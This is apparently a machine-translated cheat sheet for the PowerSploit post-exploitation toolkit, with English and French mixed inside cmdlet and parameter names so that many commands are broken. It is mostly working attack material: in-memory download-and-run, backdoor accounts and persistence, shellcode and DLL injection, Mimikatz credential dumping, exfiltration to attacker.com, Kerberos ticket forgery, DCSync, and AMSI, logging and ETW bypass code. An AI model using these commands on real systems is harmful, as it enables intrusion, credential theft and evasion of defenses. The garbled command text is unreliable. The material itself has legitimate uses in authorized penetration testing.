PowerSploit aide-mémoire
Overview
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules: CodeExecution, ScriptModification, persistance, AntivirusBypass, exfiltration, Mayhem, Privesc, and Recon. Each module contains several functions that provide various capabilities for post-exploitation activities.
⚠️ Warning: Only use PowerSploit in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.
Installation
Download from GitHub
# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"
# Extract archive
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"
# Navigate to PowerSploit directory
cd C:\Tools\PowerSploit-master\
Git Clone
# Clone repository
git clone https://github.com/PowerShellMafia/PowerSploit.git
# Navigate to directory
cd PowerSploit
Import Modules
# Import all modules
Import-Module .\PowerSploit.psd1
# Import specific modules
Import-Module .\Recon\Recon.psd1
Import-Module .\Privesc\PowerUp.ps1
Import-Module .\exfiltration\exfiltration.psd1
Import-Module .\persistance\persistance.psd1
# Import from URL (in-memory)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
Bypass Execution Policy
# Bypass execution policy for current session
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
# Run with bypass
powershell -ExecutionPolicy Bypass -File script.ps1
# Import with bypass
powershell -ExecutionPolicy Bypass -commande "Import-Module .\PowerSploit.psd1"
Recon Module
PowerView Functions
# Import PowerView
Import-Module .\Recon\PowerView.ps1
# Get domain information
Get-Domain
Get-DomainController
Get-DomainPolicy
# Get forest information
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
# Domain trust énumération
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping
# User énumération
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
Get-DomainUser -Properties samaccountname,Description
# Group énumération
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroup -AdminCount
# Computer énumération
Get-DomainComputer
Get-DomainComputer -Operating System "*Server*"
Get-DomainComputer -Ping
Get-DomainComputer -Properties name,operatingsystem,serviceprincipalname
Advanced PowerView Queries
# Find users with SPN (Kerberoastable)
Get-DomainUser -SPN
# Find computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation
# Find users with constrained delegation
Get-DomainUser -TrustedToAuth
# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired
# Find users with mot de passes not required
Get-DomainUser -mot de passeNotRequired
# Find users with mot de passes that don't expire
Get-DomainUser -mot de passeNeverExpires
# Find privileged users
Get-DomainUser -AdminCount
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse
# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess
# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include *.doc,*.docx,*.xls,*.xlsx,*.ppt,*.pptx
session and Local Admin énumération
# Find local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -ComputerName "cible-computer"
# Find domain admin sessions
Find-DomainUserLocation
Find-DomainUserLocation -UserIdentity "administrator"
# Get logged on users
Get-NetLoggedon -ComputerName "cible-computer"
Get-Netsession -ComputerName "cible-computer"
# Get local groups
Get-NetLocalGroup -ComputerName "cible-computer"
Get-NetLocalGroupMember -ComputerName "cible-computer" -GroupName "Administrators"
# processus énumération
Get-Netprocessus -ComputerName "cible-computer"
ACL and Permissions
# Get ACLs for objects
Get-ObjectAcl -Identity "Domain Admins"
Get-ObjectAcl -Identity "administrator" -ResolveGUIDs
# Find interesting ACLs
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs
# Get path ACLs
Get-PathAcl -Path "\\server\share"
# Add ACL
Add-ObjectAcl -cibleIdentity "cible-user" -PrincipalIdentity "attacker-user" -Rights DCSync
Privesc Module (PowerUp)
Basic escalade de privilèges
# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1
# Run all escalade de privilèges checks
Invoke-AllChecks
# Run specific checks
Invoke-serviceAbuse
Invoke-PrivescAudit
# Check for unquoted service paths
Get-serviceUnquoted
# Check for modifiable services
Get-Modifiableservice
# Check for modifiable service binaries
Get-ModifiableserviceFile
# Check for always install elevated
Get-RegistryAlwaysInstallElevated
# Check for auto logon identifiants
Get-RegistryAutoLogon
# Check for modifiable scheduled tasks
Get-ModifiableScheduledTaskFile
service exploitation
# Abuse unquoted service paths
Write-serviceBinary -Name "Vulnservice" -Path "C:\Program Files\Vuln service\service.exe"
# Abuse modifiable services
Invoke-serviceAbuse -Name "Vulnservice" -commande "net user porte dérobée mot de passe123 /add"
# Install service
Install-serviceBinary -Name "porte dérobéeservice" -Path "C:\Windows\Temp\porte dérobée.exe"
# Restore service
Restore-serviceBinary -Name "Vulnservice"
DLL Hijacking
# Find DLL hijacking opportunities
Find-processusDLLHijack
Find-PathDLLHijack
# Write hijack DLL
Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -commande "net user porte dérobée mot de passe123 /add"
Registry exploitation
# Check for auto-elevate binaries
Get-Applicationhôte
# Check for modifiable registry autoruns
Get-ModifiableRegistryAutoRun
# Check for Unattend files
Get-UnattendedInstallFile
# Check for web config files
Get-Webconfig
# Check for cached GPP mot de passes
Get-CachedGPPmot de passe
persistance Module
Registry persistance
# Import persistance module
Import-Module .\persistance\persistance.psd1
# Add registry persistance
Add-persistance -Method Registry -clé "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "porte dérobée" -charge utilePath "C:\Windows\Temp\porte dérobée.exe"
# Add WMI persistance
Add-persistance -Method WMI -EventName "processusStart" -charge utilePath "C:\Windows\Temp\porte dérobée.exe"
# Add scheduled task persistance
Add-persistance -Method ScheduledTask -TaskName "SystemUpdate" -charge utilePath "C:\Windows\Temp\porte dérobée.exe" -Trigger "Daily"
WMI persistance
# Install WMI porte dérobée
Install-WMIporte dérobée -charge utilePath "C:\Windows\Temp\porte dérobée.exe"
# Get WMI porte dérobée
Get-WMIporte dérobée
# Remove WMI porte dérobée
Remove-WMIporte dérobée
User Hunting
# Add user hunter
Add-UserHunter -nom d'utilisateur "administrator" -charge utilePath "C:\Windows\Temp\porte dérobée.exe"
# Get user hunter
Get-UserHunter
# Remove user hunter
Remove-UserHunter
CodeExecution Module
DLL Injection
# Import CodeExecution module
Import-Module .\CodeExecution\CodeExecution.psd1
# Invoke DLL injection
Invoke-DllInjection -processusID 1234 -Dll "C:\Windows\Temp\charge utile.dll"
# Invoke reflective PE injection
Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\charge utile.exe" -processusID 1234
# Invoke shellcode injection
Invoke-Shellcode -Shellcode $shellcode -processusID 1234
Memory Execution
# Execute PE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes
# Execute shellcode
$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...)
Invoke-Shellcode -Shellcode $shellcode
# Invoke mimikatz in memory
Invoke-Mimikatz
Invoke-Mimikatz -commande "sekurlsa::logonmot de passes"
exfiltration Module
Exfiltration de Données
# Import exfiltration module
Import-Module .\exfiltration\exfiltration.psd1
# Exfiltrate via DNS
Invoke-DNSexfiltration -Data "sensitive data" -Domain "attacker.com"
# Exfiltrate via ICMP
Invoke-ICMPexfiltration -Data "sensitive data" -cible "attacker-ip"
# Exfiltrate via HTTP
Invoke-HTTPexfiltration -Data "sensitive data" -URL "http://attacker.com/upload"
# Get clipboard contents
Get-ClipboardContents
# Get cléstrokes
Get-cléstrokes -LogPath "C:\Windows\Temp\clélog.txt"
# Take screenshots
Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30
Credential Harvesting
# Get stored identifiants
Get-VaultCredential
Get-LSASecret
# Dump SAM database
Get-SAMhashes
# Get cached domain identifiants
Get-CachedRDPconnexion
# Invoke credential prompt
Invoke-CredentialInjection
AntivirusBypass Module
AV Evasion
# Import AntivirusBypass module
Import-Module .\AntivirusBypass\AntivirusBypass.psd1
# Find AV processuses
Find-AVsignature
# Disable Windows Defender
Disable-WindowsDefender
# Bypass AMSI
Invoke-AMSIBypass
# Obfuscate script
Out-ObfuscatedAst -ScriptPath "script.ps1"
ScriptModification Module
Script Obfuscation
# Import ScriptModification module
Import-Module .\ScriptModification\ScriptModification.psd1
# Obfuscate PowerShell script
Out-Encodedcommande -ScriptBlock \\\\{Get-processus\\\\}
# Compress and encode script
Out-CompressedDll -ScriptPath "script.ps1"
# Minify script
Out-MinimizedScript -ScriptPath "script.ps1"
Mayhem Module
System Disruption
# Import Mayhem module
Import-Module .\Mayhem\Mayhem.psd1
# Set wallpaper
Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"
# Set critical processus
Set-Criticalprocessus -processusName "notepad"
# Add machine account to domain
Add-MachineAccountQuota -MachineAccount "FAKE01" -mot de passe "mot de passe123"
Advanced Techniques
Kerberoasting
# Find Kerberoastable users
Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname
# Request service tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.jetons.KerberosRequestorSecurityjeton -ArgumentList "HTTP/web.domain.com"
# Export tickets for cracking
Invoke-Mimikatz -commande "kerberos::list /export"
ASREPRoasting
# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired|Select-Object samaccountname
# Request AS-REP for user without pre-auth
Get-ASREPhash -nom d'utilisateur "vulnerable-user" -Domain "domain.com"
Golden Ticket Attack
# Get domain SID
Get-DomainSID
# Create golden ticket (requires krbtgt hash)
Invoke-Mimikatz -commande "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"
# Import golden ticket
Invoke-Mimikatz -commande "kerberos::ptt golden.kirbi"
Silver Ticket Attack
# Create silver ticket (requires service account hash)
Invoke-Mimikatz -commande "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /cible:server.domain.com /service:cifs /rc4:hash /ticket:silver.kirbi"
# Import silver ticket
Invoke-Mimikatz -commande "kerberos::ptt silver.kirbi"
DCSync Attack
# Perform DCSync (requires replication rights)
Invoke-Mimikatz -commande "lsadump::dcsync /domain:domain.com /user:krbtgt"
Invoke-Mimikatz -commande "lsadump::dcsync /domain:domain.com /user:administrator"
# DCSync all users
Invoke-Mimikatz -commande "lsadump::dcsync /domain:domain.com /all"
Automation Scripts
Domain énumération Script
#!/usr/bin/env powershell
# PowerSploit Domain énumération Script
param(
[string]$Domain = $env:USERDNSDOMAIN,
[string]$OutputDir = "C:\temp\enum"
)
# Create output directory
if (!(Test-Path $OutputDir)) \\\\{
New-Item -ItemType Directory -Path $OutputDir -Force
\\\\}
# Import PowerView
Import-Module .\Recon\PowerView.ps1
Write-hôte "[+] Starting domain énumération for: $Domain"
try \\\\{
# Domain information
Write-hôte "[+] Collecting domain information..."
Get-Domain -Domain $Domain|Out-File "$OutputDir\domain_info.txt"
Get-DomainController -Domain $Domain|Out-File "$OutputDir\domain_controllers.txt"
Get-DomainPolicy -Domain $Domain|Out-File "$OutputDir\domain_policy.txt"
# Users
Write-hôte "[+] Enumerating users..."
Get-DomainUser -Domain $Domain|Out-File "$OutputDir\users.txt"
Get-DomainUser -Domain $Domain -AdminCount|Out-File "$OutputDir\privileged_users.txt"
Get-DomainUser -Domain $Domain -SPN|Out-File "$OutputDir\kerberoastable_users.txt"
Get-DomainUser -Domain $Domain -PreauthNotRequired|Out-File "$OutputDir\asreproastable_users.txt"
# Groups
Write-hôte "[+] Enumerating groups..."
Get-DomainGroup -Domain $Domain|Out-File "$OutputDir\groups.txt"
Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain|Out-File "$OutputDir\domain_admins.txt"
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain|Out-File "$OutputDir\enterprise_admins.txt"
# Computers
Write-hôte "[+] Enumerating computers..."
Get-DomainComputer -Domain $Domain|Out-File "$OutputDir\computers.txt"
Get-DomainComputer -Domain $Domain -UnconstrainedDelegation|Out-File "$OutputDir\unconstrained_delegation.txt"
# Trusts
Write-hôte "[+] Enumerating trusts..."
Get-DomainTrust -Domain $Domain|Out-File "$OutputDir\domain_trusts.txt"
Get-ForestTrust|Out-File "$OutputDir\forest_trusts.txt"
# Shares
Write-hôte "[+] Finding shares..."
Find-DomainShare -Domain $Domain|Out-File "$OutputDir\shares.txt"
Write-hôte "[+] énumération completed. Results saved to: $OutputDir"
\\\\} catch \\\\{
Write-Error "[-] énumération failed: $($_.Exception.Message)"
\\\\}
escalade de privilèges Check Script
#!/usr/bin/env powershell
# PowerSploit escalade de privilèges Check
param(
[string]$OutputFile = "C:\temp\privesc_results.txt"
)
# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1
Write-hôte "[+] Starting escalade de privilèges checks..."
try \\\\{
# Run all checks and save to file
Invoke-AllChecks|Tee-Object -FilePath $OutputFile
Write-hôte "[+] escalade de privilèges checks completed"
Write-hôte "[+] Results saved to: $OutputFile"
# Check for immediate wins
$results = Get-Content $OutputFile
if ($results -match "Unquoted service Path") \\\\{
Write-hôte "[!] FOUND: Unquoted service paths - potential escalade de privilèges!"
\\\\}
if ($results -match "Modifiable service") \\\\{
Write-hôte "[!] FOUND: Modifiable services - potential escalade de privilèges!"
\\\\}
if ($results -match "AlwaysInstallElevated") \\\\{
Write-hôte "[!] FOUND: AlwaysInstallElevated enabled - potential escalade de privilèges!"
\\\\}
\\\\} catch \\\\{
Write-Error "[-] escalade de privilèges checks failed: $($_.Exception.Message)"
\\\\}
Credential Harvesting Script
#!/usr/bin/env powershell
# PowerSploit Credential Harvesting Script
param(
[string]$OutputDir = "C:\temp\creds"
)
# Create output directory
if (!(Test-Path $OutputDir)) \\\\{
New-Item -ItemType Directory -Path $OutputDir -Force
\\\\}
# Import modules
Import-Module .\exfiltration\exfiltration.psd1
Import-Module .\CodeExecution\CodeExecution.psd1
Write-hôte "[+] Starting credential harvesting..."
try \\\\{
# Mimikatz - dump identifiants
Write-hôte "[+] Running Mimikatz..."
Invoke-Mimikatz -commande "sekurlsa::logonmot de passes"|Out-File "$OutputDir\logonmot de passes.txt"
Invoke-Mimikatz -commande "sekurlsa::wdigest"|Out-File "$OutputDir\wdigest.txt"
Invoke-Mimikatz -commande "sekurlsa::kerberos"|Out-File "$OutputDir\kerberos.txt"
Invoke-Mimikatz -commande "sekurlsa::tspkg"|Out-File "$OutputDir\tspkg.txt"
# Registry secrets
Write-hôte "[+] Extracting registry secrets..."
Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
Get-CachedGPPmot de passe|Out-File "$OutputDir\gpp_mot de passes.txt"
# Vault identifiants
Write-hôte "[+] Extracting vault identifiants..."
Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"
# Browser identifiants
Write-hôte "[+] Extracting browser identifiants..."
Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"
Write-hôte "[+] Credential harvesting completed"
Write-hôte "[+] Results saved to: $OutputDir"
\\\\} catch \\\\{
Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)"
\\\\}
Evasion Techniques
AMSI Bypass
# Method 1: Reflection
$a = [Ref].Assembly.GetTypes()
| $a | ForEach-Object \\\\{$_.GetMethods() | ForEach-Object \\\\{if($_.Name -like "*AmsiInitialize*") \\\\{$_.Invoke($null, @($null, 0))\\\\}\\\\}\\\\} |
# Method 2: Memory patching
$Win32 = @"
using System;
using System.Runtime.Interopservices;
public class Win32 \\\\{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
\\\\}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.Interopservices.Marshal]::Copy($Patch, 0, $Address, 6)
PowerShell Logging Bypass
# Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static')
$GPO.SetValue($null, @\\\\{\\\\})
# Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings()
$settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
ETW Bypass
# Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)
Integration exemples
Cobalt Strike Integration
# PowerView integration with Cobalt Strike
beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Get-DomainUser -AdminCount
beacon> powershell Find-LocalAdminAccess
# PowerUp integration
beacon> powershell-import /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks
# Mimikatz integration
beacon> powershell Invoke-Mimikatz -commande "sekurlsa::logonmot de passes"
Empire Integration
# Use PowerSploit modules in Empire
(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user
(Empire: agents) > usemodule powershell/privesc/powerup/allchecks
(Empire: agents) > usemodule powershell/identifiants/mimikatz/logonmot de passes
Metasploit Integration
# Use PowerSploit with Metasploit
meterpreter > load powershell
meterpreter > powershell_import /path/to/PowerView.ps1
meterpreter > powershell_execute "Get-DomainUser -AdminCount"
# Post-exploitation modules
use post/windows/gather/enum_domain
use post/windows/escalate/getsystem
use post/windows/gather/identifiants/credential_collector
dépannage
Execution Policy Issues
# Check current execution policy
Get-ExecutionPolicy
# Set execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
# Bypass for single commande
powershell -ExecutionPolicy Bypass -commande "Import-Module .\PowerSploit.psd1"
# Use encoded commandes
$commande = "Import-Module .\PowerSploit.psd1"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($commande)
$encodedcommande = [Convert]::ToBase64String($bytes)
powershell -Encodedcommande $encodedcommande
AMSI Detection
# Test AMSI detection
'Invoke-Mimikatz' # Should trigger AMSI
# Obfuscate strings
$cmd = 'Inv' + 'oke-Mim' + 'ikatz'
Invoke-Expression $cmd
# Use variables
$a = 'Invoke-'
$b = 'Mimikatz'
Invoke-Expression ($a + $b)
Module Import Issues
# Force import
Import-Module .\PowerSploit.psd1 -Force
# Import with full path
Import-Module "C:\Tools\PowerSploit\PowerSploit.psd1"
# Check module path
$env:PSModulePath
# Add to module path
$env:PSModulePath += ";C:\Tools\PowerSploit"
Network Connectivity Issues
# Test network connectivity
Test-Netconnexion -ComputerName "cible" -port 445
# Check firewall
Get-NetFirewallRule|Where-Object \\\\{$_.Enabled -eq "True"\\\\}
# Use alternative ports
Get-DomainController -Server "dc.domain.com:389"
Resources
- Official PowerSploit Repository
- PowerSploit documentation
- PowerView aide-mémoire
- PowerUp documentation
- Active Directory Security
- PowerShell Empire
- BloodHound Integration
This aide-mémoire provides a comprehensive reference for using PowerSploit for Windows tests de pénétration and post-exploitation. Always ensure you have proper autorisation before using this tool in any environment.